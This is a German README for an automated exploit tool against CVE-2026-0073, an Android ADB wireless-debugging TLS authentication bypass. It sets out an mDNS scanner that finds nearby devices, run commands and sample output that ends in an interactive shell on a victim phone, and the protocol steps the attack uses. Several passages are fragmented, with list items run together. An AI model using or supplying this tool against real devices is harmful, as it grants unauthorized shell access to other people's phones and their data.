
Ein automatisierter Exploit für CVE-2026-0073 (Android ADB TLS Auth Bypass). Verfügt über einen integrierten mDNS/Zeroconf-Scanner, um randomisierte Wireless-Debugging-Ports auf Android 13+ sofort zu entdecken, und stellt eine vollständig interaktive Raw-PTY-Shell bereit.
Ein automatisierter Netzwerkscanner und Exploitationstool für CVE-2026-0073, eine Schwachstelle im Android Debug Bridge-Daemon (adbd), die unauthorisierte Remote-Codeausführung (RCE) und interaktiven Shell-Zugriff über Wireless Debugging ermöglicht.
Dieses Tool ist speziell für moderne Android-Geräte (Android 13+) optimiert und bietet eine mDNS-Autoerkennung zum Auffinden randomisierter ADB-Ports sowie eine vollständig interaktive raw PTY-Shell.
🚨 Schwachstellenzusammenfassung (Android Security Bulletin)
CVE-ID: CVE-2026-0073
Android Issue ID: A-469080888
Auswirkung: RCE (Remote Code Execution)
Schweregrad: Kritisch
Offiziell betroffene Versionen: Android 14, 15, 16, 16-qpr2 … einige behaupten, dass einige Android 13-Geräte ebenfalls anfällig sind
⚠️ Haftungsausschluss: Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken. Verwenden Sie es nicht gegen Netzwerke oder Geräte, die Ihnen nicht gehören oder für deren Test Sie keine ausdrückliche Erlaubnis haben.
Moderne Android-Geräte verwenden für Wireless Debugging gegenseitige TLS-Authentifizierung, um unautorisierte Verbindungen zu verhindern. CVE-2026-0073 legt jedoch einen kryptografischen Fehler offen: Wenn adbd ein Client-Zertifikat mit Nicht-RSA-Schlüsseln (wie Elliptic Curve ec oder ed25519) verarbeitet, gibt die interne OpenSSL-Funktion EVP_PKEY_cmp einen Fehlercode zurück, der nicht korrekt behandelt wird – die Authentifizierungsprüfung wird effektiv umgangen.
Weiterführende Literatur und tiefgehende technische Analysen dieser Schwachstelle finden Sie in folgenden Ressourcen:
Hinweis zur Anfälligkeit von Geräten: Obwohl dieser Fehler allgemein für bestimmte Android-Versionen dokumentiert ist, haben Tests in der Praxis überraschende Ergebnisse bei verschiedenen OEM-Implementierungen gezeigt. Wie der Autor des Mobile Hacker-Blogs anmerkte: "Während meines Tests konnte ich aus irgendeinem Grund auch Android 13 ausnutzen, siehe Abbildung 1. Konkret: Oppo Reno5 Z."
PATH Ihres Systems verfügbar.zeroconf (für das Netzwerkscanning).# Installieren Sie das erforderliche Python-Paket
pip install zeroconf
Führen Sie das Skript einfach ohne Argumente aus. Es lauscht 4 Sekunden lang auf dem lokalen Netzwerk, fängt die mDNS-Broadcasts aller Android-Geräte mit aktiviertem Wireless Debugging auf und zeigt Ihnen ein Menü an.
python3 adb_tls_exploit.py
Beispielausgabe:
[*] Scanne lokales Netzwerk nach Android 13+-Geräten für 4 Sekunden...
[+] Aktive Android-Geräte gefunden:
[1] 192.168.1.15 : 43881 | Pixel 7
[2] 192.168.1.42 : 39105 | Oppo Reno5 Z
Wählen Sie ein Zielgerät [1-2]: 2
============================================================
ADB TLS Auth Bypass -> Interaktive Shell
============================================================
[*] Ziel : 192.168.1.42:39105
[*] Schlüsseltyp: ec
[*] Erstelle selbstsigniertes ec-Zertifikat via openssl...
[+] Server fordert STLS an. Upgrade auf TLS...
[+] TLS-Handshake akzeptiert – gegenseitige Authentifizierung umgangen!
[*] Authentifiziert! Öffne interaktiven Shell-Dienst...
[+] Shell erhalten! (Drücken Sie Ctrl+D zum Beenden)
Reno5Z:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb)...
Wenn Sie die Ziel-IP und den randomisierten Port bereits kennen (oder ein Legacy-Gerät auf Port 5555 angreifen, das auf TLS umgestellt wurde), können Sie den Scanner überspringen:
python3 adb_tls_exploit.py <IP_ADRESSE> <PORT> [--key ec|ed25519] [--verbose]
# Beispiel
python3 adb_tls_exploit.py 192.168.1.50 42069 --key ec
zeroconf-Bibliothek, um passiv auf _adb-tls-connect._tcp.local.-Dienste zu lauschen. So können Ziele sofort kartiert werden, ohne lautes oder langsames TCP-Port-Sweeping.CNXN-Paket, das TLS-Unterstützung (tls_auth) ankündigt.STLS und fordert eine sichere Verbindung.ec) oder ed25519-Schlüssel.adbd versucht, den Schlüssel zu verifizieren. Da der Schlüssel nicht RSA ist, gibt EVP_PKEY_cmp -1 oder -2 zurück. Der anfällige Code in Android interpretiert diesen von Null abweichenden Rückgabewert fälschlicherweise als erfolgreiche kryptografische Übereinstimmung./data/misc/adb/adb_keys ist völlig leer. Der Exploit benötigt mindestens einen vorhandenen (auch nicht verwandten) Schlüssel im Keystore, um den fehlerhaften Schleifenvergleich auszulösen.apt install openssl, brew install openssl oder Installation über Windows-Binärdateien).OPEN-Paket mit dem Ziel shell\x00 und verbindet die Standard-Eingabe-/Ausgabeströme mit Ihrem Terminal. So erhalten Sie eine vollständige, nicht privilegierte Shell (uid=2000).